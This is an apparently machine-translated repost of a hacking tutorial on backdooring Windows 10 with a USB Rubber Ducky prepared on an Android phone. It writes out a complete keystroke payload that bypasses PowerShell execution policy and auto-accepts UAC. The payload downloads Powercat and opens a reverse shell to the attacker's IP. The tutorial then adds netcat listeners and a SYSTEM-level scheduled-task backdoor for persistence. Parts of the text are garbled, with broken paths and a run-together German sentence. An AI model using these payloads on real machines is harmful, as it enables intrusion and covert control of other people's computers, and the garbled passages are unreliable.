قالب وردپرس درنا توس
Home / Tips and Tricks / Backdoor of Windows 10 with an Android phone and USB rubber Ducky «zero byte :: WonderHowTo

Backdoor of Windows 10 with an Android phone and USB rubber Ducky «zero byte :: WonderHowTo



With an unobtrusive Android phone and a USB flash drive, an attacker could compromise a Windows 10 computer in less than 15 seconds. After a root shell has been set up, the long-term persistence of the backdoor can be configured with just two simple commands – bypassing antivirus software and Windows Defender.

How this Attack Works

Powercat is a fully functional PowerShell module. It works much like Netcat and allows PowerShell users to create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload is created to download, import, and run Powercat with a single command. Then it is encoded into a binary format that can understand USB Rubber Ducky.

The USB Rubber Ducky runs Powercat in Windows 1

0 as an administrator who quickly builds a root shell through the attacker's Netcat listener. At this point, persistence is configured with the schtasks command developed by Microsoft to automate tasks and commands in Windows 10.

Prerequisites

There is some hardware required to run this hack, which some of you might already have lying around. Below are the four main points listed.

1. USB Rubber Ducky

The USB Rubber Ducky identifies itself as a keyboard when plugged into a computer and then automatically types in malicious commands that are pre-programmed. The payload can be adjusted to perform a variety of advanced exploits. Prices for the USB Rubber Ducky from Hak5 start at $ 45.

Buy a USB Rubber Ducky from Amazon | Hak5

What Does the Rubber USB Ducky Look Like Without a Case? image by tokyoneon / Null Byte

As an alternative to USB Rubber Ducky, the NetHunter and DroidDucky projects can populate Android devices with keyboard input tools. You must change the Android operating system, but this is beyond the scope of this article. Both NetHunter and DroidDucky are fantastic projects for anyone who wants to change the operating system of their phones. Imagine connecting an Android phone to a computer and running complex PowerShell payloads in seconds – no USB rubber ducky required.

. 2 Android device with UserLAnd installed

Any Android phone or tablet running the UserLAnd app is eligible. The device does not need to be rooted. All that is required is Internet access via WLAN and the UserLAnd application already mentioned.

Shop for Unlocked Android Phones on Amazon

3. OTG adapter (conditional)

After creating the PowerShell payload (in a later step), it must be moved to the microSD card in UBS Rubber Ducky. Some Android phones and tablet models come with a microSD expansion slot for more storage. So if you have such a memory, you can easily do it because you can transfer the file in this way.

If your device does not have a microSD slot, you will need an On-The-Go adapter (OTG) that allows you to connect memory cards to your device through the charging port. An all-in-one solution would be the Monoprice USB-C microSD reader if your phone has a USB Type-C port. Lexar offers a similar product for micro-USB ports.

Since the USB Rubber Ducky comes with a microSD to USB adapter, you can opt for an OTG adapter with a female USB type A end for the microSD adapter plug in. If your Android device has a USB-C port, Aukey offers a good adapter. There are many low-cost options available for micro-USB ports, such as: B. the Ugreen cable.

image by tokyoneon / Null Byte

Alternatively, any combination of adapters can do the job. As you can see below, I'm using an Aukey adapter that's paired with an anchor-style portable card reader.

image by tokyoneon / null byte

4. Virtual Private Server (optional)

Whether or not a Virtual Private Server (VPS) is required depends on the attack scenario. When a Wi-Fi network is shared with the target device, embedding the attacker's local IP address into the payload works fine. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.

Step 1: Getting Started with UserLAnd

Before proceeding, read the manual of Distortion via to turn an Android phone into a hacking device without root and my guide to hacking WPA2- Wi-Fi passwords with Android as they contain the basics of UserLAnd and setting up Kali Linux, Ngrok and installing the necessary software that will follow this article. [19659004] You must install and configure UserLAnd, create a new file system, and connect to the operating system through SSH using ConnectBot (or JuiceSSH or the built-in SSH client).

Step 2: Update the System and Install Essential Software

As with any Unix-based device, you should ensure that the installed packages are up-to-date before proceeding with the projects. Make sure that updates the system and the required software is installed, and install Java that is required for the USB Rubber Ducky payload using the following commands.

  sudo apt-get update & sudo apt-get dist-upgrade 

This command may take several minutes, depending on the available Internet speed and Android CPU. Older Android devices take longer to download and decompress packages.

Use the following command to install the required software.

  sudo apt-get update & sudo apt-get install net-tools netcat gnupg curl wget git nano screen [19659033] Java is needed to compile Ducky payloads. Use the following command to install it. 

  sudo apt-get install default-jre-headless 

Restart the Android device to make sure that the entire package and kernel updates take effect the next time you launch the Android in UserLAnd Kali OS.

Step 3: Starting the Netcat Listener

There are several ways to set up the Netcat Listener to allow remote access to the Windows destination computer, depending on the attack scenario.

In any case, it is a good idea to set up Screen so that terminal sessions persist despite closed SSH connections. On the screen, users can manage multiple terminal sessions in the same console. Readers are encouraged to learn how to use Screen as it simplifies navigating and "disconnecting" multiple terminal sessions without losing data.

To start a new screen session, simply enter screen.

  screen 

Then Use the ifconfig -a command to identify the local IP address used by the system. This IP is needed in the next step when the payload is created.

  ifconfig -a 
  wlan0: flags = 4163  mtu 1500
inet 192.168.0.208 Netmask 255.255.255.0 Broadcast 192.168.0.255
inet6 ::::: prefixlen 64 scopeid 0x20 
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX Packets 95745 Bytes 115985231 (110.6 MiB)
RX error 0 fell 0 exceeded 0 frame 0
TX packets 44735 bytes 4289090 (4.0 MiB)
TX error 0 dropped 0 exceeded 0 carrier 0 collision 0 

Many interfaces will be available in the UserLAnd Kali OS. The "wlan0" or "wlan1" interface most likely contains the device's local IP address (192.168.0.208). Instead, VPS users integrate the same external IP address used with SSHing into the server. Ngrok users must set up a server and embed the URL in the payload.

Finally, start the Netcat Listener with the following command.

  netcat -vv -l -p 1234 

Using port ([19459009)] -p ) In 1234, Netcat listens on every available interface ( -l ). -vv ( verbose ) returns the IP address of the destination in the terminal when a new connection is made.

Step 4: Create the Payload

After launch the Android app, launch the UserLAnd app and SSH into the new potash system. Use nano to create a new "payload.txt" file in your home directory ( ~ / ). This file contains the Ducky payload in plain text.

  nano ~ / payload.txt 

Comments ( REM ) have been added to explain the function of each payload line.

  REM This first delay lasts the Ducky for 5.5 seconds to reach the target
REM operating system some time to mount the USB as a keyboard device.
DELAY 5500
REM Opens the Windows command prompt.
GUI r
REM delays by .7 seconds to give the boot prompt time to open.
DELAY 700
REM Specifies the PowerShell payload.
STRING Powershell / w 1 / C $ a = $ env: TEMP; Set-ExecutionPolicy Bypass; wget https://cutt.ly/cW13i -o $ a  d.ps1; ipmo $ a  d.ps1; powercat -c 192.168.0.208 -p 1234 -e powershell
REM Press Ctrl + Shirt + Enter to run PowerShell with administrator privileges.
CTRL-SHIFT
REM Delay: 0.85 seconds for the UAC prompt to open.
DELAY 850
REM Press Alt + Y to bypass User Account Control.
ALT y 

There's a lot going on in the PowerShell One Liner. There are several commands separated by semicolons.

  • $ a = $ env: TEMP - Temporary directory of target is set to variable $ a. This variable will be called twice in the script later. First act as output directory for the powercat.ps1 and called again on import. The use of the single letter $ helps to shorten the overall length of the payload. This is more effective than using "C: Users % USERNAME% AppData Local Temp" in the payload.
  • Set-ExecutionPolicy Bypass - Set-ExecutionPolicy is a security feature of PowerShell that prevents many features from similar PowerShell payloads. In several tests, I found that setting the -ExecutionPolicy option was not enough to bypass this security feature. As administrator (root), this policy can be bypassed.
  • wget https://cutt.ly/cW13i -o $ a d.ps1 - PowerShell is directed to invoke a web request ( wget ) and calls the powercat.ps1 with the shortened cutt.ly URL. This URL links directly to the Powercat GitHub page, but can be changed to the full URL or other shortened URL. The powercat.ps1 is stored in the temporary directory ( $ a ) with the file name "d.ps1" ( -o ). The file name was shortened from a single letter to keep the Ducky payload as short as possible.
  • ipmo $ a d.ps1 - The PowerShell Import Module function is called with the alias ipmo . , Again, use the shorter version of the command to keep the Ducky payload short. The powercat.ps1 is imported.
  • powercat -c 192.168.0.208 -p 1234 -e Powershell - Finally, Powercat is run and instructed to connect ( -c ) to the server of the attacker ( 192.168.0.208 ) at the port ( -p ) 1234 and execute ( -e ) PowerShell when the connection is established. This allows the attacker to effectively access a root PowerShell terminal.

The REM comments can remain in the payload and have no effect on the keystrokes. To save and terminate the nano-terminal press ctrl-x then and then . Enter .

Step 5: Encryption of Payload

Rubber USB Rubber Ducky Payloads can not be loaded in plain text onto the microSD card . Instead, the Hak5 Duck Encoder is used to convert the plaintext payload to a binary format.

To clone the Duck Encoder repository, use the following command. Https://github.com/hak5darren/ USB-Rubber-Ducky /

Change ( cd ) to the newly created encoder / directory.

  cd USB-Rubber-Ducky / Encoder / 

and encrypt the payload.txt using the command below. This command uses the encoder.jar file to convert the input file ( -i ) to the required binary file "inject.bin" ( -o ). The name of the output file is not arbitrary and must be named "inject.bin" for Ducky to make keystrokes.

  java -jar encoder.jar -i ~ / payload.txt -o inject.bin 
  Hak5 Duck Encoder 2.6.4

Loading file .... [ OK ]
Keyboard file is loading .... [ OK ]
Loading language file ... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete ..... [ OK ] 

When this is done, there will be a new "inject.bin" file in the Encoder / directory. This can be checked with the following command ls -l .

  ls -l 
  -rw -r - r--. 1 root root 1466 Jan 11 11:39 README
-rw-r - r--. 1 root root 57535 Jan 11 11:39 encoder.jar
-rw-r - r--. 1 root root 86 Jan 12 01:57 inject.bin
drwxr-xr-x. 2 root root 4096 January 11 11:39 AM resources
drwxr-xr-x. 2 root root 4096 Jan 11 11:39 src 

Step 6: Connect the Ducky MicroSD to the Android device

Insert the Ducky microSD card with the card reader adapter, the internal microSD card slot, or the OTG adapter with card reader in the Android device. The contents of the microSD file can be viewed using the Android download app.

picture of tokyoneon / Null Byte

After a few seconds, a new removable disk is available via the download app ( Example ). Navigate back to the Kali OS terminal. The Kali operating system does not have access to external storage devices (such as the microSD card). Therefore, the "inject.bin" must first be copied to the / sdcard / Download / directory ( cp ), then copied to the microSD card using the Android operating system.

  cp ~ / USB-Rubber-Ducky / Encoder / inject.bin / sdcard / Download / 

And now it's available in the download app. [19659085] Android for Hackers: Backdoor of Windows 10 with an Android Phone and USB Rubber Ducky ” width=”532″ height=”532″ style=”max-width:532px;height:auto;”/>

  Android for Hackers: Backdoor of Windows 10 with an Android Phone & USB Rubber Ducky

Highlight "inject. bin "and touch the" Copy To "button. Then copy it to the microSD card and eject the microSD safely from the Android device.

Step 7: Start Hacking

Insert the USB Rubber Ducky into the Windows 10 target computer and reconnect The Android device is being set up.

  nc -vv -l -p 1234

Ncat: Version 7.70 (https://nmap.org/ncat)

Ncat: connection from 192.168.0.33.
Ncat: connection from 192.168.0.33:49672.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:  Windows  system32> 

Netcat reports a new "xx.xx.xx.xx connection" with the IP address of the destination. If you execute a command such as ls or pwd the files in the current directory are listed or the current directory name is printed. The program can begin.

Step 8: Setting Persistence (optional)

After setting up a reverse shell, you must first set up persistence if the current connection is lost. This is an optional step, but it is recommended if long term use is desired. In Windows 10, there are several ways to create persistence. The following is an option.

Initially, the command schtasks can be used to schedule tasks for Windows 10 that should be run automatically. For example, it would be possible for Windows 10 to connect to the attacker's server every X minutes. X is an arbitrary period, e.g. 10 minutes or 120 minutes.

To a goal to get around, sees the immutable, to use PowerShell pop-pop with a split second, has schtasks a useful function to perform only the commands when [ComputeristimLeerlaufWennsichderBildschirmindenRuhezustandversetzthatoderderBildschirmschoneraktivistversuchternureineVerbindungzumServerdesAngreifersherzustellenDiesistidealwenndasTerminal-PopupnurdannausgeführtwerdensollwennderBesitzerdesPCsvomGerätentferntist[19659004] The command schtasks has a limit of ~ 175 characters, which makes running long commands a challenge. To get around this quickly, first create a backdoor.ps1 containing the Powercat download, import, and run commands.

  echo "IEX (New-Object System.Net.Webclient) .DownloadString (& # 39; https: // raw. Githubusercontent.com/besimorhino/powercat/master/powercat.ps1 & # 39;); powercat - c 192.168.0.208 -p 2 -e Powershell "> C:  ProgramData  Microsoft  Windows  backdoor.ps1 

The Windows directory is used to store backdoor.ps1, but this location is completely optional. The directory and filename can be changed to better disguise the script's location and prevent the target from stumbling upon it. Similarly, the port number ( -p 2 ) can be changed to another port.

You can then use schtasks to run "backdoor.ps1" when the computer is down

  schtasks / create / f / ru "NT AUTHORITY  SYSTEM" / tn "Backdoor" / tr "Powershell -w 1 -ep Bypass C:  ProgramData  Microsoft  Windows  backdoor.ps1" / sc onidle / i 1 
  SUCCESS: The scheduled "Backdoor" task has been successfully created. 

The Task Scheduler (Tasks) creates a task named ( / tn ) "Backdoor". The task to perform ( / tr ) executes the backdoor.ps1 script. The frequency ( / sc ) at which the command is executed is set to "onidle", instructing the computer to execute the command only when the device is idle. Finally, the amount of time (in minutes) is given by the argument / i and set to 1 minute.

Short, one minute after ] If the target is removed from the computer, an attempt is made to execute the backdoor.ps1 file embedded in the Microsoft directory. Note: If the destination is restored, Windows 10 will automatically terminate the connection. The connection will only persist if the destination is not removed from the computer. Just restart the Netcat server and wait for the computer to be idle again. Each time it tries to make a new connection.

In another screen session, create a new Netcat listener and wait for the Windows computer to be idle.

  nc -vv -l -p 2 
  Ncat: Version 7.70 (https://nmap.org/ncat)

Ncat: connection from 192.168.0.33.
Ncat: connection from 192.168.0.33:24276.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:  Windows  system32> 

There are lots of fun with tasks. To learn more about the available arguments, use the command schtasks /? and schtasks / Create /? as shown below.

  schtasks / Create /? 

Other Android and PowerShell hacks to come

An Android device and a small USB device can wreak havoc on an attacker on a Windows computer network. With only 15 seconds of physical access required to execute the payload, an administrator shell can be set up that allows the attacker to embed long-term persistence into the device.

Android with UserLAnd is great as a hacking device. However, there are some limitations. The CPU does not have what it takes to run full frameworks such as Metasploit, Empire, and Wine. In future articles, we will be looking forward to advanced attacks after exploitation. For example, capturing keystrokes and recording audio from the microphone can only be done with Android and PowerShell.

Cover Picture and Screenshots of tokyoneon / zero byte

Source link